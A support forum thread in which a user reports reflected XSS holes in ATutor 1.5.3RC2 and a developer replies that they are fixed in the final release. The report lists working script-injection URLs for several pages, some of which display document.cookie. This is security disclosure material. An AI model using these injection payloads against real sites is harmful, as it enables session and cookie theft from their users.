Support Forums
ATutor Bug Reports
Security Bugs
You must be signed-in to post.
| Author | Subject | |
|---|---|---|
| Page: 1 | ||
| security | Subject: Security Bugs |  |
| Hello, There are several XSS security bugs in ATutor : /ATutor-1.5.3RC2/admin/create_course.php?show_courses="><script>alert(1)</script><a%20"¤t_cat="><script>alert(2)</script><a%20" /ATutor-1.5.3RC2/users/create_course.php?show_courses="><script>alert(1)</script><a%20" /ATutor-1.5.3RC2/documentation/admin/?p=2.0.configuration.php"></frameset></frameset><script>alert(document.cookie)</script><!-- /ATutor-1.5.3RC2/password_reminder.php?forgot=Email+Reminder"><script>alert(document.cookie)</script><a%20" /ATutor-1.5.3RC2/users/browse.php?cat=0"><script>alert(document.cookie)</script><a%20" /ATutor-1.5.3RC2/admin/fix_content.php?submit=Submit"><script>alert(document.cookie)</script><a%20" Note that some of these bugs maybe doesnt work with Firefox . With regards, securitynews.ir/ Posted: 2006-07-05 04:40:54 | ||
 | ||
greg | Subject: Re: Security Bugs | |
| These have been fixed, and are available in the final release. thx Posted: 2006-07-05 08:19:48 | ||
| ||
hunar 5.9.php | Subject: Re: Security Bugs | |
| If you are asking for help, provide lots of detail so problems can be reproduced. Things to describe: Operating system ATutor is installed on - ATutor version - Patch #s applied - ATutor theme name - PHP version - MySQL version - Webserver & version - Copies of error messages - Changes to default settings - Web browser being used - ...and anything else relevant - Posted: 2010-03-23 15:47:08 | ||
| ||
| Page: 1 | ||
You must be signed-in to post.